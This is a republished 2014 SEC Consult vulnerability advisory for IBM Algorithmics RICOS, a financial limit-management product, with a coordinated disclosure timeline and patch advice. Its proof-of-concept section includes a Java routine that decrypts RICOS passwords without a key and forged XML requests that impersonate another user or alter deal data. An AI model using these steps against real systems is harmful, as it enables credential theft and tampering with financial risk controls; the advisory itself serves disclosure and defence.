what you don't know can hurt you

IBM Algorithmics RICOS Disclosure / XSS / CSRF

IBM Algorithmics RICOS Disclosure / XSS / CSRF
Posted Jun 30, 2014
Authored by F. Lukavsky, A. Kolmann, V. Habsburg-Lothringen | Site sec-consult.com

IBM Algorithmics RICOS versions 4.5.0 through 4.7.0 suffer from cross site scripting, cross site request forgery, information disclosure, data manipulation, broken encryption, and various other vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure, csrf
advisories | CVE-2014-0864, CVE-2014-0865, CVE-2014-0866, CVE-2014-0867, CVE-2014-0868, CVE-2014-0869, CVE-2014-0870, CVE-2014-0871, CVE-2014-0894
MD5 | b8df7e37d1837ce179ae7e94c785a9ab

IBM Algorithmics RICOS Disclosure / XSS / CSRF

Change Mirror Download
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
title: Multiple severe vulnerabilities
product: IBM Algorithmics RICOS
vulnerable version: 4.5.0 - 4.7.0
fixed version:
CVE number: CVE-2014-0894
impact: critical
homepage: http://www-01.ibm.com/software/analytics/algorithmics/
found: 2013-12-19
by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
SEC Consult Vulnerability Lab

Vendor description:
- -------------------
IBM Algorithmics software enables financial institutions and corporate
treasuries to make risk-aware business decisions. Supported by a global
team of risk experts based in all major financial centers, IBM
Algorithmics solution offerings include market, credit and liquidity risk,
as well as collateral and capital management.

Source: http://www-01.ibm.com/software/analytics/algorithmics/

RICOS is a pre-deal limit management solution part of the Algo Suite.

Business recommendation:
- ------------------------
The identified vulnerabilities affect integrity and confidentiality of the
risk management system. SEC Consult does not recommend to rely on RICOS as
part of risk management until a thorough security review has been performed
by security professionals. As a workaround, access should be limited only to
trusted users internally and sample checks regarding the plausibility of limits
should be performed manually.

Vulnerability overview/description:
- -----------------------------------
1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
The Tomcat configuration discloses technical details within error messages to
the user, which allows an attacker to collect valuable data about the
environment of the solution.

2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
The password and the username of the backend database are disclosed in
clear-text to the user of the web application. This allows attackers to
directly connect to the backend database and manipulate arbitrary data stored
in the database (e.g. limits).

3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
Several parameters in the RICOS web front end and the Blotter are not properly
sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
user sessions and impersonate other users while performing arbitrary actions
on behalf of the victim user.

4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
Weak cryptographic algorithms, being used to store and transfer
user's passwords, allow an attacker to retrieve the plain-text passwords
without further knowledge of cryptographic keys.

5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /
CVSS 3.5)
Several fields of stored data within RICOS are marked as read-only in the web
application, disallowing modification of certain fields. These checks are only
performed client-side, allowing an attacker to alter arbitrary data. An
attacker can create a limit, alter the username of the created limit and
confirm the limit himself, circumventing dual control mechanisms advertised by

6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
cookies for a user that clicks on a manipulated link.

7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
The RICOS fat client submits user credentials in plain-text. An attacker with
access to the network communication can perform man-in-the-middle attacks and
steal user credentials.
This vulnerability also applies to the Blotter, where authentication is
performed unencrypted.

8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
The RICOS fat client performs input validation only client-side. This allows
an attacker to alter arbitrary data. An attacker can create a limit, alter
the username of the created limit and confirm the limit himself, circumventing
dual control mechanisms advertised by RICOS.

9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
The web application does not verify that requests are made only from within
the web application, allowing an attacker to trick users into performing
requests to the web application. This allows an attacker to perform tasks on
behalf of the victim user like modifying limits.

Proof of concept:
- -----------------
1) Information Disclosure
The following URL causes a status 404, disclosing the Tomcat version:

If control characters (i.e. \x00) are sent as part of the cookie, a stack trace
is triggered

2) Password Disclosure
The following request sent by the client during regular communication shows the
database connection settings including the username and the password in

POST /ricos470/Executer HTTP/1.1
Host: ricos

<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i
n="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t
n="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"
v="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i
n="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i
n="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"

3) Non-permanent Cross-Site Scripting
The following URLs demonstrate Cross-Site Scripting vulnerabilities:

POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
Host: ricos






4) Broken Encryption
The user's password is transported frequently in requests within the application.
The following function decrypts the password without requiring any cryptographic key:

public static void decrypt(String string)
int nRadix = 32;
int nR2 = nRadix * nRadix / 2;
GregorianCalendar cal = new GregorianCalendar();
String key = string.substring(0, 2);
int nKey = Integer.parseInt(key, 32);

String encPw = string.substring(2, string.length());
int y = 0;
for (int i = 0; i < encPw.length(); i+=2)
String aktuell = encPw.substring(i,i+2);
int new_value = Integer.parseInt(aktuell, 32);
int character = - nKey * (y + 1) % nR2 + new_value;
char decrypt = (char) character;
y = y + 1;

5) Manipulation of read-only data / dual control mechanism bypass
The following example illustrates how to manipulate a request so that the server
saves it on behalf of another user (only the relevant parts are shown):

<?xml version="1.0" encoding="UTF-8"?>
<t n="Service">
<i n="RequestType" v="#Action"/>
<t n="#ActionData">
<i n="#ActionName" v="web.getmeta_udf"/>
<i n="#Mode" v="#Sync"/>
<i n="#Request" v="#Execute"/>
<t n="#OutputData">
<t n="#MapTable">
<i n="#ResultData" v="#ResultData"/>
<i n="#ResultTable" v="#ResultTable"/>
<t n="#InputData">
<t n="#WorkTable">
<t n="det_limit">
<i n="SCTYGEID" v="A"/>
<i n="LMLCURID" v="other_user"/>
<i n="LMEQEPSTDA" v=""/>
<i n="MFURID" v="other_user"/>
<i n="LMEVFL" v="N"/>
<i n="SOLMFL" v="N"/>
<i n="CRURID" v="other_user"/>
<i n="MFTS" v=""/>
<i n="MFURID" v="other_user"/>
<i n="CRURID" v="other_user"/>
<i n="MFTS" v=""/>
<t n="Session">
<t n="SessionData">
<i n="LoginUser" v="other_user"/>
<i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>
<i n="LoginUser v="other_user"/>
<i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>
<i n="URN" v=""/>
<i n="SecServiceURN" v="obsv2:ricos:20100"/>
<t n="ObServer">
<i n="UserId" v="other_user"/>
<i n="Password" v=""/>
<i n="Host" v="ricos"/>
<i n="Prefix" v="RICA"/>
<i n="DbSystem" v="oracle"/>
<i n="LoginUserId" v="other_user"/>

6) Cross-Site Cookie Setting
The following URL allows setting of arbitrary cookies:


7) Plain-text submission of passwords
Neither the fat client nor the Blotter use https to communicate with the
backend server. Both send unencrypted credentials via http during authentication.

8) Client-side Input Validation
By manipulating serialized objects that are transmitted by the fat client,
it is possible to change the user name who created a limit, allowing an attacker
to bypass dual control mechanisms.

9) Cross-Site Request Forgery
The following request, sent on behalf of an authenticated user will e.g.
change the currency of a given deal:

POST http://ricos/ricos470/Executer HTTP/1.1
Host: ricos

<?xml version="1.0" encoding="UTF-8"?>
<t n="Service">
<i n="RequestType" v="#Action"/>
<t n="#ActionData">
<i n="#ActionName" v="web.updrec_msp"/>
<i n="#Mode" v="#Sync"/>
<i n="#Request" v="#Execute"/>
<t n="#InputData">
<t n="#MapTable">
<i n="#InputData" v="det_msp"/>
<t n="#WorkTable">
<t n="det_msp">
<i n="SYPMID" v="SYS-PAR-ID"/>
<i n="CUCD" v="USD"/>
<i n="MIGORILV" v="11"/>
<i n="ILPLMVFL" v="Y"/>
<i n="ILNEMVFL" v="Y"/>
<i n="BSCUONFL" v="N"/>
<i n="PBSCUOFL" v="N"/>
<i n="LORICUTEFL" v="N"/>
<i n="SYSAVAILFL" v="F"/>
<i n="CUSTID" v="CUSTOMER"/>
<i n="UDF1" v="Welcome to ricos 4.71"/>

Vulnerable / tested versions:
- -----------------------------
IBM Algorithmics RICOS 4.71

Vendor contact timeline:
- ------------------------
2014-01-24: Contacting vendor through psirt@vnet.ibm.com
2014-01-24: Vendor response, will likely require more than 30 days to resolve issues
asking for acknowledgements
2014-01-24: Sending acknowledgements
2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues
2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
2014-02-10: Providing further information on assumed to be false positive issue 1441
2014-02-14: Telco to clarify vulnerability details and agree on further procedure
patches are scheduled for end of June 2014
2014-02-20: Vendor confirms issue 1441 to be a vulnerability
2014-05-27: Vendor announces that patches will be released on 2014-06-30
2014-06-26: Vendor published patches and security bulletin
2014-06-30: SEC Consult publishes the advisory

- ---------
Apply patch ACLM FP5. More information:

- -----------
Limit access to RICOS and manually perform sample checks regarding the
plausibility of limits.

Advisory URL:
- -------------

SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF F. Lukavsky / @2014
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    16 Files
  • 23
    Oct 23rd
    2 Files
  • 24
    Oct 24th
    1 Files
  • 25
    Oct 25th
    1 Files
  • 26
    Oct 26th
    17 Files
  • 27
    Oct 27th
    19 Files
  • 28
    Oct 28th
    29 Files
  • 29
    Oct 29th
    13 Files
  • 30
    Oct 30th
    8 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By